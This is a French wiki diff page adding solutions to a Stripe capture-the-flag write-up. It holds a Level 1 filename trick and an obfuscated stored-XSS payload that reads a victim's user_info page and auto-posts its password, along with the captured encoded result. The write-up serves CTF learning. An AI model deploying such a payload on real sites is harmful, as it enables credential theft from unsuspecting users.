Zenk - Security

Outils d'utilisateurs

Outils du Site

Piste:
stripe_ctf

Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

stripe_ctf [2012/08/29 10:23]
mooh [Level 6] 		stripe_ctf [2017/04/09 15:33] (Version actuelle)
Ligne 227: Ligne 227:
 > https://level01-2.stripe-ctf.com/user-ntyjkglswi/?attempt=ref:%20refs/heads/master&filename=https://level01-2.stripe-ctf.com/user-ntyjkglswi/level01-code/HEAD > https://level01-2.stripe-ctf.com/user-ntyjkglswi/?attempt=ref:%20refs/heads/master&filename=https://level01-2.stripe-ctf.com/user-ntyjkglswi/level01-code/HEAD
  
 +** Autre solution : **
 +
 +> https://level01-2.stripe-ctf.com/user-vleajmvjkj/?attempt=&filename=a
 +
 +Le fichier a n'existant pas il suffit de laisser le champ password vide.
  
 ====== Level 2 ====== ====== Level 2 ======
Ligne 1620: Ligne 1625:
 </div> </div>
 </code> </code>
 +
 +** Solution **
 +Une fois enregistre, la page principale contient une liste de posts et la liste des utilisateurs en ligne. L'utilisateur peut ajouter des nouveaux posts et cliquer sur son nom. Ceci ouvrira la page ''user_info'' qui contient le username et le password.
 +Comme pour l'epreuve du karma, l'idee est de forger un post de maniere a ce que quand celui-ci sera affiche par l'utilisateur level07-password-holder, les donnees de la page ''user_info'' seront lues et directement postees.
 +Voila un exemple de script que l'on pourrait utiliser
 +<code javascript>
 +$(function()
 +{
 +$(window).bind('load', function()
 +{
 +function httpGet(theUrl)
 +    {
 +    var xmlHttp = null;
 +
 +    xmlHttp = new XMLHttpRequest();
 +    xmlHttp.open( "GET", theUrl, false );
 +    xmlHttp.send( null );
 +    return xmlHttp.responseText;
 +    }
 +
 +value = httpGet("https://level06-2.stripe-ctf.com/user-fgdshrgpxf/user_info")
 +
 +output = "";
 + for(i=0; i<value.length; ++i)
 + {
 + if(output != "") output += ", ";
 + output += value.charCodeAt(i);
 + }
 +
 +document.getElementById("new_post").title.value = "pw"
 +document.getElementById("new_post").content.value = output
 +
 +
 +document.getElementById("new_post").submit()
 +
 +});
 +});
 +</code>
 +On remarque l'utilisation de ''$(window).bind('load', function()'' car il faut attendre que la page soit entierement chargee avant de pouvoir utiliser le formulaire.
 +On encode aussi le resultat de la requete GET car sinon il y a des problemes d'encodage quand on cree un post avec le contenu html.
 +Il ne reste plus qu'a trouver un endroit ou on peut injecter notre code.
 +Et c'est dans le username. Si on essaie de mettre le script entier dans le username, il y a une erreur au niveau du serveur, on va donc l'encoder egalement, ce qui donne
 +<code javascritp>
 +<script>
 +eval(String.fromCharCode(36,40,102,117,110,99,116,105,111,110,40,41,10,123,10,10,36,40,119,105,110,100,111,119,41,46,98,105,110,100,40,39,108,111,97,100,39,44,32,102,117,110,99,116,105,111,110,40,41,10,123,10,10,102,117,110,99,116,105,111,110,32,104,116,116,112,71,101,116,40,116,104,101,85,114,108,41,10,32,32,32,32,123,10,32,32,32,32,118,97,114,32,120,109,108,72,116,116,112,32,61,32,110,117,108,108,59,10,10,32,32,32,32,120,109,108,72,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,10,32,32,32,32,120,109,108,72,116,116,112,46,111,112,101,110,40,32,34,71,69,84,34,44,32,116,104,101,85,114,108,44,32,102,97,108,115,101,32,41,59,10,32,32,32,32,120,109,108,72,116,116,112,46,115,101,110,100,40,32,110,117,108,108,32,41,59,10,32,32,32,32,114,101,116,117,114,110,32,120,109,108,72,116,116,112,46,114,101,115,112,111,110,115,101,84,101,120,116,59,10,32,32,32,32,125,10,10,118,97,108,117,101,32,61,32,104,116,116,112,71,101,116,40,34,104,116,116,112,115,58,47,47,108,101,118,101,108,48,54,45,50,46,115,116,114,105,112,101,45,99,116,102,46,99,111,109,47,117,115,101,114,45,102,103,100,115,104,114,103,112,120,102,47,117,115,101,114,95,105,110,102,111,34,41,10,10,111,117,116,112,117,116,32,61,32,34,34,59,10,9,102,111,114,40,105,61,48,59,32,105,60,118,97,108,117,101,46,108,101,110,103,116,104,59,32,43,43,105,41,10,9,123,10,9,9,105,102,40,111,117,116,112,117,116,32,33,61,32,34,34,41,32,111,117,116,112,117,116,32,43,61,32,34,44,32,34,59,10,9,9,111,117,116,112,117,116,32,43,61,32,118,97,108,117,101,46,99,104,97,114,67,111,100,101,65,116,40,105,41,59,10,9,125,10,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,110,101,119,95,112,111,115,116,34,41,46,116,105,116,108,101,46,118,97,108,117,101,32,61,32,34,112,119,34,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,110,101,119,95,112,111,115,116,34,41,46,99,111,110,116,101,110,116,46,118,97,108,117,101,32,61,32,111,117,116,112,117,116,10,10,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,110,101,119,95,112,111,115,116,34,41,46,115,117,98,109,105,116,40,41,10,10,125,41,59,10,125,41,59))
 +</script>
 +</code>
 +
 +On cree ensuite un post quelconque et on attend que l'utilisateur 07 se connecte et on recupere son post
 +<code>
 +60, 33, 100, 111, 99, 116, 121, 112, 101, 32, 104, 116, 109, 108, 62, 10, 60, 104, 116, 109, 108, 62, 10, 32, 32, 60, 104, 101, 97, 100, 62, 10, 32, 32, 32, 32, 60, 116, 105, 116, 108, 101, 62, 83, 116, 114, 101, 97, 109, 101, 114, 60, 47, 116, 105, 116, 108, 101, 62, 10, 32, 32, 32, 32, 60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 39, 47, 117, 115, 101, 114, 45, 102, 103, 100, 115, 104, 114, 103, 112, 120, 102, 47, 106, 115, 47, 106, 113, 117, 101, 114, 121, 45, 49, 46, 56, 46, 48, 46, 109, 105, 110, 46, 106, 115, 39, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62, 10, 32, 32, 32, 32, 60, 108, 105, 110, 107, 32, 114, 101, 108, 61, 39, 115, 116, 121, 108, 101, 115, 104, 101, 101, 116, 39, 32, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 99, 115, 115, 39, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 104, 114, 101, 102, 61, 39, 47, 117, 115, 101, 114, 45, 102, 103, 100, 115, 104, 114, 103, 112, 120, 102, 47, 99, 115, 115, 47, 98, 111, 111, 116, 115, 116, 114, 97, 112, 45, 99, 111, 109, 98, 105, 110, 101, 100, 46, 109, 105, 110, 46, 99, 115, 115, 39, 32, 47, 62, 10, 32, 32, 60, 47, 104, 101, 97, 100, 62, 10, 32, 32, 60, 98, 111, 100, 121, 62, 10, 32, 32, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 110, 97, 118, 98, 97, 114, 39, 62, 10, 32, 32, 32, 32, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 110, 97, 118, 98, 97, 114, 45, 105, 110, 110, 101, 114, 39, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 99, 111, 110, 116, 97, 105, 110, 101, 114, 39, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 60, 97, 32, 99, 108, 97, 115, 115, 61, 39, 98, 114, 97, 110, 100, 39, 32, 104, 114, 101, 102, 61, 39, 47, 117, 115, 101, 114, 45, 102, 103, 100, 115, 104, 114, 103, 112, 120, 102, 47, 39, 62, 83, 116, 114, 101, 97, 109, 101, 114, 60, 47, 97, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 60, 117, 108, 32, 99, 108, 97, 115, 115, 61, 39, 110, 97, 118, 32, 112, 117, 108, 108, 45, 114, 105, 103, 104, 116, 39, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 60, 108, 105, 62, 60, 97, 32, 104, 114, 101, 102, 61, 39, 47, 117, 115, 101, 114, 45, 102, 103, 100, 115, 104, 114, 103, 112, 120, 102, 47, 108, 111, 103, 111, 117, 116, 39, 62, 76, 111, 103, 32, 79, 117, 116, 60, 47, 97, 62, 60, 47, 108, 105, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 60, 47, 117, 108, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 47, 100, 105, 118, 62, 10, 32, 32, 32, 32, 32, 32, 60, 47, 100, 105, 118, 62, 10, 32, 32, 32, 32, 60, 47, 100, 105, 118, 62, 10, 32, 32, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 99, 111, 110, 116, 97, 105, 110, 101, 114, 39, 62, 10, 10, 32, 32, 32, 32, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 114, 111, 119, 39, 62, 10, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 115, 112, 97, 110, 49, 50, 39, 62, 10, 32, 32, 32, 32, 60, 104, 51, 62, 85, 115, 101, 114, 32, 73, 110, 102, 111, 114, 109, 97, 116, 105, 111, 110, 60, 47, 104, 51, 62, 10, 32, 32, 32, 32, 60, 116, 97, 98, 108, 101, 32, 99, 108, 97, 115, 115, 61, 39, 116, 97, 98, 108, 101, 32, 116, 97, 98, 108, 101, 45, 99, 111, 110, 100, 101, 110, 115, 101, 100, 39, 62, 10, 32, 32, 32, 32, 32, 32, 60, 116, 114, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 116, 104, 62, 85, 115, 101, 114, 110, 97, 109, 101, 58, 60, 47, 116, 104, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 116, 100, 62, 108, 101, 118, 101, 108, 48, 55, 45, 112, 97, 115, 115, 119, 111, 114, 100, 45, 104, 111, 108, 100, 101, 114, 60, 47, 116, 100, 62, 10, 32, 32, 32, 32, 32, 32, 60, 47, 116, 114, 62, 10, 32, 32, 32, 32, 32, 32, 60, 116, 114, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 116, 104, 62, 80, 97, 115, 115, 119, 111, 114, 100, 58, 60, 47, 116, 104, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 116, 100, 62, 39, 68, 83, 109, 98, 88, 77, 102, 87, 112, 107, 106, 88, 34, 60, 47, 116, 100, 62, 10, 32, 32, 32, 32, 32, 32, 60, 47, 116, 114, 62, 10, 32, 32, 32, 32, 60, 47, 116, 97, 98, 108, 101, 62, 10, 32, 32, 60, 47, 100, 105, 118, 62, 10, 60, 47, 100, 105, 118, 62, 10, 10, 32, 32, 32, 32, 60, 47, 100, 105, 118, 62, 10, 32, 32, 60, 47, 98, 111, 100, 121, 62, 10, 60, 47, 104, 116, 109, 108, 62, 10
 +</code>
 +Un coup de ''fromCharCode'' et on obtient son mot de passe
  
 ====== Level 7 ====== ====== Level 7 ======
  
 ====== Level 8 ====== ====== Level 8 ======
stripe_ctf.1346228594.txt.gz · Dernière modification: 2017/04/09 15:33 (modification externe)

Outils de la Page

Sauf mention contraire, le contenu de ce wiki est placé sous la licence suivante : CC Attribution-Share Alike 3.0 Unported
CC Attribution-Share Alike 3.0 Unported Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki